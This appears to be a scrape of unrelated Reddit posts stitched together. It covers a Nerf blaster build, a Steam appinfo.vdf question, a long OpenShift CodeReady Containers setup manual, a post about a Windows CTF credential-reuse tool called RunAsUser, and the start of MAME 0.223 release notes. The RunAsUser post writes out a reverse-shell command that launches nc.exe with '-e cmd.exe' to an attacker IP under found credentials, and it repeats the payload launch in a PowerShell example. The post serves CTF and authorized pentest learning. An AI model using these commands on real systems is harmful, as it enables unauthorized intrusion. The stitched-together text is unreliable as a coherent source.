The closed loop control system allows for the variable air pressure, plus it also monitors the internal pressure to detect the optimum time to fire and vent the core. The regulator is set to about 110 - 120 psi and you get incredibly quick charge times. This helps the system run faster than the magazine follower and you can effectively run whatever DPS you want - with the blaster turning it down as the bottle starts getting close to empty.

So far the maximum I have gotten out of this setup was a shade over 420fps, and the minimum was just under 50fps. It's very stable and reliable in the 200 - 300 range.

Demo video: https://youtu.be/CM311Xk63Wc

Pics:

The blaster
Compared to one of my other FDL-3's
FDL-3 with an air tank
Family photo
Family photo
Family photo
Turned up to '11'
Turned down to 'Jolt'
Pics for mobile: https://imgur.com/a/V4Xp4oH
submitted by airzonesama to Nerf [link] [comments]

Anybody knows how to stop Steam from updating the appinfo.vdf file on startup?

Hi. I'm trying to create a clone of Steam Edit for Linux. The application works by modifying the appinfo.vdf file located in steam/appcache/appinfo.vdf. This lets you edit basically all the metadata of the game, name, genres, tags, and most importantly launch options, which is handy to set up modded/vanilla installations.
I found a library that lets me edit the file, which is cool since it's a binary file. However, whenever I edit the file, Steam reverts the changes on startup with the "Updating steam configuration" dialogue.
I have no idea on how to make this not happen. Steam Edit has a "Apply and refresh" button which closes Steam and reopens it without modifying the file, and the changes stay until Steam decides to update it because of new games or whatever. However, Steam Edit is closed source so I have no way to see how it does it, and upon contacting the developer they don't seem too eager to talk about it.
I tried to use the -noverifyfiles launch parameter but it updated it anyway.
So... ideas? Or a better place to post this? I really doubt I'll find much help here but anything would be helpful. Thanks.
submitted by SnooPets20 to Steam [link] [comments]

Red Hat OpenShift Container Platform Instruction Manual for Windows Powershell

Introduction to the manual
This manual is made to guide you step by step in setting up an OpenShift cloud environment on your own device. It will tell you what needs to be done, when it needs to be done, what you will be doing and why you will be doing it, all in one convenient manual that is made for Windows users. Although, if you want to try it on Linux or macOS, we did add the commands necessary to get the CodeReady Containers to run on your operating system. Be warned, however: there are some system requirements that are necessary to run the CodeReady Containers that we will be using. These requirements are specified within the chapter Minimum system requirements.
This manual is written for everyone with an interest in the Red Hat OpenShift Container Platform and has at least a basic understanding of the command line within PowerShell on Windows. Even though it is possible to use most of the manual for Linux or MacOS we will focus on how to do this within Windows.
If you follow this manual you will be able to do the following items by yourself:
● Installing the CodeReady Containers
● Updating OpenShift
● Configuring a CodeReady Container
● Configuring the DNS
● Accessing the OpenShift cluster
● Deploying the Mediawiki application
What is the OpenShift Container platform?
Red Hat OpenShift is a cloud development Platform as a Service (PaaS). It enables developers to develop and deploy their applications on a cloud infrastructure. It is based on the Kubernetes platform and is widely used by developers and IT operations worldwide. The OpenShift Container platform makes use of CodeReady Containers. CodeReady Containers are pre-configured containers that can be used for developing and testing purposes. There are also CodeReady Workspaces, these workspaces are used to provide any member of the development or IT team with a consistent, secure, and zero-configuration development environment.
The OpenShift Container Platform is widely used because it helps programmers and developers build their applications faster thanks to CodeReady Containers and CodeReady Workspaces, and it also allows them to test their applications in the same environment. One of the advantages provided by OpenShift is the efficient container orchestration. This allows for faster container provisioning, deploying and management, by streamlining and automating these processes.
What knowledge is required or recommended to proceed with the installation?
To be able to follow this manual some knowledge is mandatory, because most of the commands are done within the Command Line interface it is necessary to know how it works and how you can browse through files/folders. If you either don’t have this basic knowledge or have trouble with the basic Command Line Interface commands from PowerShell, then a cheat sheet might offer some help. We recommend the following cheat sheet for windows:
https://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf
Another option is to read through the operating system’s documentation or introduction guides. Though the documentation can be overwhelming by the sheer amount of commands.
Microsoft: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands
macOS
https://www.makeuseof.com/tag/mac-terminal-commands-cheat-sheet/
Linux
https://ubuntu.com/tutorials/command-line-for-beginners#2-a-brief-history-lesson https://www.guru99.com/linux-commands-cheat-sheet.html
http://cc.iiti.ac.in/docs/linuxcommands.pdf
Aside from the required knowledge there are also some things that can be helpful to know just to make the use of OpenShift a bit simpler. This consists of some general knowledge on PaaS like Dockers and Kubernetes.
Docker https://www.docker.com/
Kubernetes https://kubernetes.io/

System requirements

Minimum System requirements

The Red Hat OpenShift CodeReady Containers have the following minimum hardware requirements:
Hardware requirements
Code Ready Containers requires the following system resources:
● 4 virtual CPUs
● 9 GB of free random-access memory
● 35 GB of storage space
● A physical CPU with virtualization support, VT-x (Intel) or SVM mode (AMD); this has to be enabled in the BIOS
Software requirements
The Red Hat OpenShift CodeReady Containers have the following minimum operating system requirements:
Microsoft Windows
On Microsoft Windows, the Red Hat OpenShift CodeReady Containers requires the Windows 10 Pro Fall Creators Update (version 1709) or newer. CodeReady Containers does not work on earlier versions or other editions of Microsoft Windows. Microsoft Windows 10 Home Edition is not supported.
macOS
On macOS, the Red Hat OpenShift CodeReady Containers requires macOS 10.12 Sierra or newer.
Linux
On Linux, the Red Hat OpenShift CodeReady Containers is only supported on Red Hat Enterprise Linux/CentOS 7.5 or newer and on the latest two stable Fedora releases.
When using Red Hat Enterprise Linux, the machine running CodeReady Containers must be registered with the Red Hat Customer Portal.
Ubuntu 18.04 LTS or newer and Debian 10 or newer are not officially supported and may require manual set up of the host machine.

Required additional software packages for Linux

The CodeReady Containers on Linux require the libvirt and Network Manager packages to run. Consult the following table to find the command used to install these packages for your Linux distribution:
Table 1.1 Package installation commands by distribution
Linux Distribution Installation command
Fedora: sudo dnf install NetworkManager
Red Hat Enterprise Linux/CentOS: su -c 'yum install NetworkManager'
Debian/Ubuntu: sudo apt install qemu-kvm libvirt-daemon libvirt-daemon-system network-manager

Installation

Getting started with the installation

To install CodeReady Containers a few steps must be undertaken. Because an OpenShift account is necessary to use the application this will be the first step. An account can be made on “https://www.openshift.com/”, where you need to press login and after that select the option “Create one now”
After making an account the next step is to download the latest release of CodeReady Containers and the pulled secret on “https://cloud.redhat.com/openshift/install/crc/installer-provisioned”. Make sure to download the version corresponding to your platform and/or operating system. After downloading the right version, the contents have to be extracted from the archive to a location in your $PATH. The pulled secret should be saved because it is needed later.
The command line interface has to be opened before we can continue with the installation. For windows we will use PowerShell. All the commands we use during the installation procedure of this guide are going to be done in this command line interface unless stated otherwise. To be able to run the commands within the command line interface, use the command line interface to go to the location in your $PATH where you extracted the CodeReady zip.
If you have installed an outdated version and you wish to update, then you can delete the existing CodeReady Containers virtual machine with the $crc delete command. After deleting the container, you must replace the old crc binary with a newly downloaded binary of the latest release.
C:\Users\[username]\$PATH>crc delete 
When you have done the previous steps please confirm that the correct and up to date crc binary is in use by checking it with the $crc version command, this should provide you with the version that is currently installed.
C:\Users\[username]\$PATH>crc version 
To set up the host operating system for the CodeReady Containers virtual machine you have to run the $crc setup command. After running crc setup, crc start will create a minimal OpenShift 4 cluster in the folder where the executable is located.
C:\Users\[username]>crc setup 

Setting up CodeReady Containers

Now we need to set up the new CodeReady Containers release with the $crc setup command. This command will perform the operations necessary to run the CodeReady Containers and create the ~/.crc directory if it did not previously exist. In the process you have to supply your pulled secret, once this process is completed you have to reboot your system. When the system has restarted you can start the new CodeReady Containers virtual machine with the $crc start command. The $crc start command starts the CodeReady virtual machine and OpenShift cluster.
You cannot change the configuration of an existing CodeReady Containers virtual machine. So if you have a CodeReady Containers virtual machine and you want to make configuration changes you need to delete the virtual machine with the $crc delete command and create a new virtual machine and start that one with the configuration changes. Take note that deleting the virtual machine will also delete the data stored in the CodeReady Containers. So, to prevent data loss we recommend you save the data you wish to keep. Also keep in mind that it is not necessary to change the default configuration to start OpenShift.
C:\Users\[username]\$PATH>crc setup 
Before starting the machine, you need to keep in mind that it is not possible to make any changes to the virtual machine. For this tutorial however it is not necessary to change the configuration, if you don’t want to make any changes please continue by starting the machine with the crc start command.
C:\Users\[username]\$PATH>crc start 
It is possible that you will get a Nameserver error later on; if this is the case, please start it with crc start -n 1.1.1.1

Configuration

It is not necessary to change the default configuration to continue with this tutorial; this chapter is here for those that wish to do so and know what they are doing. However, for macOS and Linux it is necessary to change the DNS settings.

Configuring the CodeReady Containers

To start the configuration of the CodeReady Containers use the command crc config. This command allows you to configure the crc binary and the CodeReady virtual machine. The command has some requirements before it’s able to configure. This requirement is a subcommand, the available subcommands for this binary and virtual machine are:
get, this command allows you to see the values of a configurable property
set/unset, this command can be used for 2 things. To display the names of, or to set and/or unset values of several options and parameters. These parameters being:
○ Shell options
○ Shell attributes
○ Positional parameters
view, this command starts the configuration in read-only mode.
These commands need to operate on named configurable properties. To list all the available properties, you can run the command $crc config --help.
Throughout this manual we will use the $crc config command a few times to change some properties needed for the configuration.
There is also the possibility to use the crc config command to configure the behavior of the checks that are done by the $crc start and $crc setup commands. By default, the startup checks will stop the process if their conditions are not met. To bypass this potential issue, you can set the value of a property that starts with skip-check or warn-check to true to skip the check or get a warning instead of ending up with an error.
C:\Users\[username]\$PATH>crc config get <property> 
C:\Users\[username]\$PATH>crc config set <property> <value> 
C:\Users\[username]\$PATH>crc config unset <property> 
C:\Users\[username]\$PATH>crc config view 
C:\Users\[username]\$PATH>crc config --help 
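For example, to skip a single startup check you would set its property to true (the property name below is only illustrative; list the real names on your version with $crc config --help):

C:\Users\[username]\$PATH>crc config set skip-check-ram true 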

Configuring the Virtual Machine

You can use the CPUs and memory properties to configure the default number of vCPU’s and amount of memory available for the virtual machine.
To increase the number of vCPUs available to the virtual machine, use $crc config set cpus <number-of-vcpus>. Keep in mind that the default number of vCPUs is 4 and the number of vCPUs you wish to assign must be equal to or greater than the default value.
To increase the memory available to the virtual machine, use $crc config set memory <memory-in-MiB>. Keep in mind that the default amount of memory is 9216 Mebibytes and the amount of memory you wish to assign must be equal to or greater than the default value.
C:\Users\[username]\$PATH>crc config set cpus <number-of-vcpus> 
C:\Users\[username]\$PATH>crc config set memory <memory-in-MiB> 
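As a concrete example, assigning 6 vCPUs and 12288 MiB of memory (the values are arbitrary, as long as they are at or above the defaults) would look like:

C:\Users\[username]\$PATH>crc config set cpus 6 
C:\Users\[username]\$PATH>crc config set memory 12288 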

Configuring the DNS

Window / General DNS setup

There are two domain names used by the OpenShift cluster that are managed by the CodeReady Containers, these are:
crc.testing, this is the domain for the core OpenShift services.
apps-crc.testing, this is the domain used for accessing OpenShift applications that are deployed on the cluster.
Configuring the DNS settings in Windows is done by executing the crc setup. This command automatically adjusts the DNS configuration on the system. When executing crc start additional checks to verify the configuration will be executed.

macOS DNS setup

MacOS expects the following DNS configuration for the CodeReady Containers
● The CodeReady Containers creates a file that instructs macOS to forward all DNS requests for the testing domain to the CodeReady Containers virtual machine. This file is created at /etc/resolver/testing.
● The oc binary requires the following CodeReady Containers entry to function properly: api.crc.testing adds an entry to /etc/hosts pointing at the VM IP address.

Linux DNS setup

CodeReady Containers expect a slightly different DNS configuration on Linux. CodeReady Containers expect NetworkManager to manage networking. On Linux, NetworkManager uses dnsmasq through a configuration file, namely /etc/NetworkManager/conf.d/crc-nm-dnsmasq.conf.
To set it up properly the dnsmasq instance has to forward the requests for the crc.testing and apps-crc.testing domains to “192.168.130.11”. In /etc/NetworkManager/conf.d/crc-nm-dnsmasq.conf this will look like the following:
● server=/crc.testing/192.168.130.11
● server=/apps-crc.testing/192.168.130.11

Accessing the Openshift Cluster

Accessing the Openshift web console

To gain access to the OpenShift cluster running in the CodeReady virtual machine you need to make sure that the virtual machine is running before continuing with this chapter. The OpenShift clusters can be accessed through the OpenShift web console or the client binary(oc).
First you need to execute the $crc console command, this command will open your web browser and direct a tab to the web console. After that, you need to select the htpasswd_provider option in the OpenShift web console and log in as a developer user with the output provided by the crc start command.
It is also possible to view the password for kubeadmin and developer users by running the $crc console --credentials command. While you can access the cluster through the kubeadmin and developer users, it should be noted that the kubeadmin user should only be used for administrative tasks such as user management and the developer user for creating projects or OpenShift applications and the deployment of these applications.
C:\Users\[username]\$PATH>crc console 
C:\Users\[username]\$PATH>crc console --credentials 

Accessing the OpenShift cluster with oc

To gain access to the OpenShift cluster with the use of the oc command you need to complete several steps.
Step 1.
Execute the $crc oc-env command to print the command needed to add the cached oc binary to your PATH:
C:\Users\[username]\$PATH>crc oc-env 
Step 2.
Execute the printed command. The output will look something like the following:
PS C:\Users\OpenShift> crc oc-env 
$Env:PATH = "C:\Users\OpenShift\.crc\bin\oc;$Env:PATH" 
# Run this command to configure your shell: 
# & crc oc-env | Invoke-Expression 
This means we have to execute the command that the output gives us, in this case that is:
C:\Users\[username]\$PATH>crc oc-env | Invoke-Expression 
This has to be executed every time you start; a solution is to move the oc binary to the same path as the crc binary.
To test if this step went correctly execute the following command, if it returns without errors oc is set up properly
C:\Users\[username]\$PATH>.\oc 
Step 3
Now you need to login as a developer user, this can be done using the following command:
$oc login -u developer https://api.crc.testing:6443
Keep in mind that the $crc start will provide you with the password that is needed to login with the developer user.
C:\Users\[username]\$PATH>oc login -u developer https://api.crc.testing:6443 
Step 4
The oc can now be used to interact with your OpenShift cluster. If you for instance want to verify if the OpenShift cluster Operators are available, you can execute the command
$oc get co 
Keep in mind that by default the CodeReady Containers disable the functions provided by the machine-config and monitoring Operators.
C:\Users\[username]\$PATH>oc get co 

Demonstration

Now that you are able to access the cluster, we will take you on a tour through some of the possibilities within OpenShift Container Platform.
We will start by creating a project. Within this project we will import an image, and with this image we are going to build an application. After building the application we will explain how upscaling and downscaling can be used within the created application.
As the next step we will show the user how to make changes in the network route. We also show how monitoring can be used within the platform, however within the current version of CodeReady Containers this has been disabled.
Lastly, we will show the user how to use user management within the platform.

Creating a project

To be able to create a project within the console you have to login on the cluster. If you have not yet done this, this can be done by running the command crc console in the command line and logging in with the login data from before.
When you are logged in as admin, switch to Developer. If you're logged in as a developer, you don't have to switch. Switching between users can be done with the dropdown menu top left.
Now that you are properly logged in press the dropdown menu shown in the image below, from there click on create a project.
https://preview.redd.it/ytax8qocitv51.png?width=658&format=png&auto=webp&s=72d143733f545cf8731a3cca7cafa58c6507ace2
When you press the correct button, the following image will pop up. Here you can give your project a name and description. We chose to name it CodeReady with a displayname CodeReady Container.
https://preview.redd.it/vtaxadwditv51.png?width=594&format=png&auto=webp&s=e3b004bab39fb3b732d96198ed55fdd99259f210

Importing image

The Containers in OpenShift Container Platform are based on OCI or Docker formatted images. An image is a binary that contains everything needed to run a container as well as the metadata of the requirements needed for the container.
Within the OpenShift Container Platform it’s possible to obtain images in a number of ways. There is an integrated Docker registry that offers the possibility to download new images “on the fly”. In addition, OpenShift Container Platform can use third party registries such as:
- https://hub.docker.com/
- https://catalog.redhat.com/software/containers/search
Within this manual we are going to import an image from the Red Hat container catalog. In this example we’ll be using MediaWiki.
Search for the application in https://catalog.redhat.com/software/containers/search

https://preview.redd.it/c4mrbs0fitv51.png?width=672&format=png&auto=webp&s=f708f0542b53a9abf779be2d91d89cf09e9d2895
Navigate to “Get this image”
Follow the steps to “create a registry service account”, after that you can copy the YAML.
https://preview.redd.it/b4rrklqfitv51.png?width=1323&format=png&auto=webp&s=7a2eb14a3a1ba273b166e03e1410f06fd9ee1968
After the YAML has been copied we will go to the topology view and click on the YAML button
https://preview.redd.it/k3qzu8dgitv51.png?width=869&format=png&auto=webp&s=b1fefec67703d0a905b00765f0047fe7c6c0735b
Then we have to paste in the YAML, put in the name, namespace and your pull secret name (which you created through your registry account) and click on create.
https://preview.redd.it/iz48kltgitv51.png?width=781&format=png&auto=webp&s=4effc12e07bd294f64a326928804d9a931e4d2bd
Run the import command within powershell
$oc import-image openshift4/mediawiki --from=registry.redhat.io/openshift4/mediawiki --confirm 
imagestream.image.openshift.io/mediawiki imported 

Creating and managing an application

There are a few ways to create and manage applications. Within this demonstration we’ll show how to create an application from the previously imported image.

Creating the application

To create an application from the previously imported image, go back to the console and topology. From here, select container image.
https://preview.redd.it/6506ea4iitv51.png?width=869&format=png&auto=webp&s=c0231d70bb16c76cd131e6b71256e93550cc8b37
For the option image you'll want to select the “image stream tag from internal registry” option. Give the application a name and then create the deployment.
https://preview.redd.it/tk72idniitv51.png?width=813&format=png&auto=webp&s=a4e662cf7b96604d84df9d04ab9b90b5436c803c
If everything went right during the creating process you should see the following, this means that the application is successfully running.
https://preview.redd.it/ovv9l85jitv51.png?width=901&format=png&auto=webp&s=f78f350207add0b8a979b6da931ff29ffa30128c

Scaling the application

In OpenShift there is a feature called autoscaling. There are two types of application scaling, namely vertical scaling, and horizontal scaling. Vertical scaling is adding only more CPU and hard disk and is no longer supported by OpenShift. Horizontal scaling is increasing the number of machines.
One of the ways to scale an application is by increasing the number of pods. This can be done by going to a pod within the view as seen in the previous step. By either pressing the up or down arrow more pods of the same application can be added. This is similar to horizontal scaling and can result in better performance when there are a lot of active users at the same time.
https://preview.redd.it/s6i1vbcrltv51.png?width=602&format=png&auto=webp&s=e62cbeeed116ba8c55704d61a990fc0d8f3cfaa1
In the picture above we see the number of nodes and pods and how many resources those nodes and pods are using. This is something to keep in mind if you want to scale up your application, the more you scale it up, the more resources it will take up.
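The same scaling can also be done from the command line instead of the console. Assuming the deployment created earlier in this demonstration is named mediawiki, the following command would scale it to three pods:

C:\Users\[username]\$PATH>oc scale deployment mediawiki --replicas=3 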

https://preview.redd.it/quh037wmitv51.png?width=194&format=png&auto=webp&s=5e326647b223f3918c259b1602afa1b5fbbeea94

Network

Since OpenShift Container platform is built on Kubernetes it might be interesting to know some theory about its networking. Kubernetes, on which the OpenShift Container platform is built, ensures that the Pods within OpenShift can communicate with each other via the network and assigns them their own IP address. This makes all containers within the Pod behave as if they were on the same host. By giving each pod its own IP address, pods can be treated as physical hosts or virtual machines in terms of port mapping, networking, naming, service discovery, load balancing, application configuration and migration. To run multiple services such as front-end and back-end services, OpenShift Container Platform has a built-in DNS.
One of the changes that can be made to the networking of a Pod is the Route. We’ll show you how this can be done in this demonstration.
The Route is not the only thing that can be changed and or configured. Two other options that might be interesting but will not be demonstrated in this manual are:
- Ingress controller, Within OpenShift it is possible to set your own certificate. A user must have a certificate / key pair in PEM-encoded files, with the certificate signed by a trusted authority.
- Network policies, by default all pods in a project are accessible from other pods and network locations. To isolate one or more pods in a project, it is possible to create Network Policy objects in that project to indicate the allowed incoming connections. Project administrators can create and delete Network Policy objects within their own project.
There is a search function within the Container Platform. We’ll use this to search for the network routes and show how to add a new route.
https://preview.redd.it/8jkyhk8pitv51.png?width=769&format=png&auto=webp&s=9a8762df5bbae3d8a7c92db96b8cb70605a3d6da
You can add items that you use a lot to the navigation
https://preview.redd.it/t32sownqitv51.png?width=1598&format=png&auto=webp&s=6aab6f17bc9f871c591173493722eeae585a9232
For this example, we will add Routes to navigation.
https://preview.redd.it/pm3j7ljritv51.png?width=291&format=png&auto=webp&s=bc6fbda061afdd0780bbc72555d809b84a130b5b
Now that we’ve added Routes to the navigation, we can start the creation of the Route by clicking on “Create route”.
https://preview.redd.it/5lgecq0titv51.png?width=1603&format=png&auto=webp&s=d548789daaa6a8c7312a419393795b52da0e9f75
Fill in the name, select the service and the target port from the drop-down menu and click on Create.
https://preview.redd.it/qczgjc2uitv51.png?width=778&format=png&auto=webp&s=563f73f0dc548e3b5b2319ca97339e8f7b06c9d6
As you can see, we’ve successfully added the new route to our application.
https://preview.redd.it/gxfanp2vitv51.png?width=1588&format=png&auto=webp&s=1aae813d7ad0025f91013d884fcf62c5e7d109f1
Storage
OpenShift makes use of Persistent Storage, this type of storage uses persistent volume claims(PVC). PVC’s allow the developer to make persistent volumes without needing any knowledge about the underlying infrastructure.
Within this storage there are a few configuration options:
It is, however, important to know how to manually reclaim persistent volumes: if you delete a PV, the associated data will not be automatically deleted with it, and therefore you cannot reassign the storage to another PV yet.
To manually reclaim the PV, you need to follow the following steps:
Step 1: Delete the PV, this can be done by executing the following command
$oc delete pv <pv-name> 
Step 2: Now you need to clean up the data on the associated storage asset
Step 3: Now you can delete the associated storage asset, or if you wish to reuse the same storage asset you can now create a PV with the storage asset definition.
It is also possible to directly change the reclaim policy within OpenShift, to do this you would need to follow the following steps:
Step 1: Get a list of the PVs in your cluster
$oc get pv 
This will give you a list of all the PVs in your cluster and will display the following attributes for each: Name, Capacity, Access Modes, Reclaim Policy, Status, Claim, StorageClass, Reason and Age.
Step 2: Now choose the PV you wish to change and execute one of the following commands, depending on your preferred policy:
$oc patch pv <pv-name> -p '{"spec":{"persistentVolumeReclaimPolicy":"Retain"}}' 
In this example the reclaim policy will be changed to Retain.
$oc patch pv <pv-name> -p '{"spec":{"persistentVolumeReclaimPolicy":"Recycle"}}' 
In this example the reclaim policy will be changed to Recycle.
$oc patch pv <pv-name> -p '{"spec":{"persistentVolumeReclaimPolicy":"Delete"}}' 
In this example the reclaim policy will be changed to Delete.

Step 3: After this you can check the PV to verify the change by executing this command again:
$oc get pv 

Monitoring

Within Red Hat OpenShift there is the possibility to monitor the data that has been created by your containers, applications, and pods. To do so, click on the menu option in the top left corner. Check if you are logged in as Developer and click on “Monitoring”. Normally this function is not activated within the CodeReady containers, because it uses a lot of resources (Ram and CPU) to run.
https://preview.redd.it/an0wvn6zitv51.png?width=228&format=png&auto=webp&s=51abf8cc31bd763deb457d49514f99ee81d610ec
Once you have activated “Monitoring” you can change the “Time Range” and “Refresh Interval” in the top right corner of your screen. This will change the monitoring data on your screen.
https://preview.redd.it/e0yvzsh1jtv51.png?width=493&format=png&auto=webp&s=b2c563635cfa60ea7ce2f9c146aa994df6aa1c34
Within this function you can also monitor “Events”. These events are records of important information and are useful for monitoring and troubleshooting within the OpenShift Container Platform.
https://preview.redd.it/l90vkmp3jtv51.png?width=602&format=png&auto=webp&s=4e97f14bedaec7ededcdcda96e7823f77ced24c2

User management

According to the OpenShift documentation, a user is an entity that interacts with the OpenShift Container Platform API. This can be a developer for developing applications or an administrator for managing the cluster. Users can be assigned to groups, which set the permissions applied to all the group’s members. For example, you can give API access to a group, which gives all members of the group API access.
There are multiple ways to create a user depending on the configured identity provider. The DenyAll identity provider is the default within OpenShift Container Platform. This default denies access for all the usernames and passwords.
First, we’re going to create a new user. The way this is done depends on the identity provider and on the mapping method used as part of the identity provider configuration.
for more information on what mapping methods are and how they function:
https://docs.openshift.com/enterprise/3.1/install_config/configuring_authentication.html
With the default mapping method, the steps will be as following
$oc create user <username> 
Next up, we’ll create an OpenShift Container Platform Identity. Use the name of the identity provider and the name that uniquely represents this identity in the scope of the identity provider:
$oc create identity <identity-provider>:<identity-provider-user-name> 
The <identity-provider> is the name of the identity provider in the master configuration. For example, the following command creates an Identity with identity provider ldap_provider and the identity provider username mediawiki_s.
$oc create identity ldap_provider:mediawiki_s 
Create a useidentity mapping for the created user and identity:
$oc create useridentitymapping <identity-provider>:<identity-provider-user-name> <username> 
For example, the following command maps the identity to the user:
$oc create useridentitymapping ldap_provider:mediawiki_s mediawiki 
Now were going to assign a role to this new user, this can be done by executing the following command:
$oc create clusterrolebinding <clusterrolebinding-name> \
 --clusterrole=<role-name> --user=<username> 
There is a --clusterrole option that can be used to give the user a specific role, like a cluster user with admin privileges. The cluster admin has access to all files and is able to manage the access level of other users.
Below is an example of the admin clusterrole command:
$oc create clusterrolebinding registry-controller \ --clusterrole=cluster-admin --user=admin 

What did you achieve?

If you followed all the steps within this manual you now should have a functioning Mediawiki Application running on your own CodeReady Containers. During the installation of this application on CodeReady Containers you have learned how to do the following things:
● Installing the CodeReady Containers
● Updating OpenShift
● Configuring a CodeReady Container
● Configuring the DNS
● Accessing the OpenShift cluster
● Deploying an application
● Creating new users
With these skills you’ll be able to set up your own Container Platform environment and host applications of your choosing.

Troubleshooting

Nameserver
There is the possibility that your CodeReady container can't connect to the internet due to a Nameserver error. When this is encountered a working fix for us was to stop the machine and then start the CRC machine with the following command:
C:\Users\[username]\$PATH>crc start -n 1.1.1.1 
Hyper-V admin
Should you run into a problem with Hyper-V it might be because your user is not an admin and therefore can’t access the Hyper-V admin user group.
  1. Click Start > Control Panel > Administration Tools > Computer Management. The Computer Management window opens.
  2. Click System Tools > Local Users and Groups > Groups. The list of groups opens.
  3. Double-click the Hyper-V Administrators group. The Hyper-V Administrators Properties window opens.
  4. Click Add. The Select Users or Groups window opens.
  5. In the Enter the object names to select field, enter the user account name to whom you want to assign permissions, and then click OK.
  6. Click Apply, and then click OK.

Terms and definitions

These terms and definitions will be expanded upon; below you can see an example of how this is going to look, together with a few terms that require definitions.
Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications. Openshift is based on Kubernetes.
Clusters are a collection of multiple nodes which communicate with each other to perform a set of operations.
Containers are the basic units of OpenShift applications. These container technologies are lightweight mechanisms for isolating running processes so that they are limited to interacting with only their designated resources.
CodeReady Container is a minimal, preconfigured cluster that is used for development and testing purposes.
CodeReady Workspaces uses Kubernetes and containers to provide any member of the development or IT team with a consistent, secure, and zero-configuration development environment.

Sources

  1. https://www.ibm.com/support/knowledgecenter/en/SSMKFH/com.ibm.apmaas.doc/install/hyperv_config_add_nonadmin_user_hyperv_usergroup.html
  2. https://access.redhat.com/documentation/en-us/openshift_container_platform/4.5/
  3. https://docs.openshift.com/container-platform/3.11/admin_guide/manage_users.html
submitted by Groep6HHS to openshift [link] [comments]

RunAsUser - Windows CTF Tool

RunAsUser - Windows CTF Tool
Hi All,
First I want to thank this community as it has been an absolute goldmine for help along the way.
So what is this post about?
Along my journey I have developed a number of tools and scripts that I find to be helpful in certain scenarios. I am a strong believer in knowledge sharing and would like to give back to the community. If this tool just helps one person then I will be happy.
What is the tool?
I have come across a number of boxes now (Windows) where you may find credentials after obtaining your initial shell. The purpose is to usually reuse these credentials in some way to either pivot or escalate.
Unlike Linux, there is not a simple "su" command to just switch to the new user.
This is a simple tool to allow you to reuse those credentials and execute programs as the other user. So for example, if you have nc.exe or an msfvenom shell executable on the Windows machine and happen to find some credentials during your enumeration, then you can execute those files in the context of the new user.
Where can this be used?
Most recently I have used this on HTB (Chatterbox & JSON). At some point I may release a walkthrough to demonstrate RunAsUser being used on these boxes.
After you obtain the credentials on the JSON box you can simply run RunAsUser.exe like this:
runasuser.exe -u superadmin -p funnyhtb -f c:\Users\Public\nc.exe -a '10.10.14.12 9001 -e cmd.exe' 

  • -u = username
  • -p = password
  • -f = file to execute
  • -a = arguments (optional)
Alternatively, you do not need to supply the command-line arguments as above; you can enter them one at a time in a step-by-step approach.

https://preview.redd.it/08xvsjntvuw51.png?width=567&format=png&auto=webp&s=9e929d6d34eff036259285b284031ff2a509f271
Are there other ways of doing this?
In PowerShell you can achieve this by creating a credential object and passing that object when starting the process. However, on some boxes you may find that you have limited or no PowerShell capability without it crashing your shell. There are other ways to achieve this from a cmd shell, but in my experience those have been hit and miss.
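A rough sketch of that PowerShell approach is below. The username, password, payload path and arguments are just the illustrative JSON values from earlier, not anything you should expect to reuse verbatim:
  # build a credential object from the recovered username and password
  $pass = ConvertTo-SecureString 'funnyhtb' -AsPlainText -Force
  $cred = New-Object System.Management.Automation.PSCredential('superadmin', $pass)
  # launch the payload in the context of that user
  Start-Process -FilePath 'C:\Users\Public\nc.exe' -ArgumentList '10.10.14.12 9001 -e cmd.exe' -Credential $cred
As noted above, this can hang or crash a limited shell, which is exactly the gap RunAsUser is meant to fill.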
Now there will likely be other ways of pivoting or escalating and reusing those credentials but this can sometimes be a more direct path.
Notes about tool
This isn't an everyday tool, but it can certainly help you out on restrictive boxes where you have identified credentials.
I will likely update the tool in due course to include some better error handling and validation etc, but for now, it does what is required. I made this tool to help me out for this exact purpose and thought it may help others as well.
The advisory
I will always add an advisory to any tool or script I post.
All the binaries/scripts/code of RunAsUser should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it only on your own networks and/or with the network owner's permission.
Finally
As I said previously, I hope this tool can help someone and I shall be posting more tools and scripts in the near future when I find the time.
Stay safe all :-)
https://github.com/atthacks/RunAsUser

************Edit************
As mentioned in the first comment, it is possible to use runas to execute a program in the context of another user. But as I have put in the description, I have not always been successful in getting this to work, and from what I understand there can be a few reasons for that.
Anyway, I have uploaded a GIF to the GitHub page (https://github.com/atthacks/RunAsUser) so you can see what happens when I try to use "runas" on Chatterbox and, ultimately, what happens when I run "RunAsUser". When you run "runas", it skips straight past the point where it should let you type the password. Chatterbox is not the only machine I have experienced this on.
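For reference, the built-in command being compared against looks roughly like this (again using the illustrative JSON credentials from above). Note that runas has no switch for supplying the password; it can only prompt for it interactively, which is exactly the step that gets skipped on boxes like Chatterbox:
  # runas can only prompt for the password - there is no flag to pass it on the command line
  runas /user:superadmin "C:\Users\Public\nc.exe 10.10.14.12 9001 -e cmd.exe"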
This tool is not the only solution to do this task and there are other ways of achieving the same outcome, such as PsExec. However, it is a quick tool that I enjoyed making and hopefully someone may find it helpful.

submitted by atthacks to oscp [link] [comments]

MAME 0.223

MAME 0.223

MAME 0.223 has finally arrived, and what a release it is – there’s definitely something for everyone! Starting with some of the more esoteric additions, Linus Åkesson’s AVR-based hardware chiptune project and Power Ninja Action Challenge demos are now supported. These demos use minimal hardware to generate sound and/or video, relying on precise CPU timings to work. With this release, every hand-held LCD game from Nintendo’s Game & Watch and related lines is supported in MAME, with Donkey Kong Hockey bringing up the rear. Also of note is the Bassmate Computer fishing aid, made by Nintendo and marketed by Telko and other companies, which is clearly based on the dual-screen Game & Watch design. The steady stream of TV games hasn’t stopped, with a number of French releases from Conny/VideoJet among this month’s batch.
For the first time ever, games running on the Barcrest MPU4 video system are emulated well enough to be playable. Titles that are now working include several games based on the popular British TV game show The Crystal Maze, Adders and Ladders, The Mating Game, and Prize Tetris. In a clear win for MAME’s modular architecture, the breakthrough came through the discovery of a significant flaw in our Motorola MC6840 Programmable Timer Module emulation that was causing issues for the Fairlight CMI IIx synthesiser. In the same manner, the Busicom 141-PF desk calculator is now working, thanks to improvements made to Intel 4004 CPU emulation that came out of emulating the INTELLEC 4 development system and the prototype 4004-based controller board for Flicker pinball. The Busicom 141-PF is historically significant, being the first application of Intel’s first microprocessor.
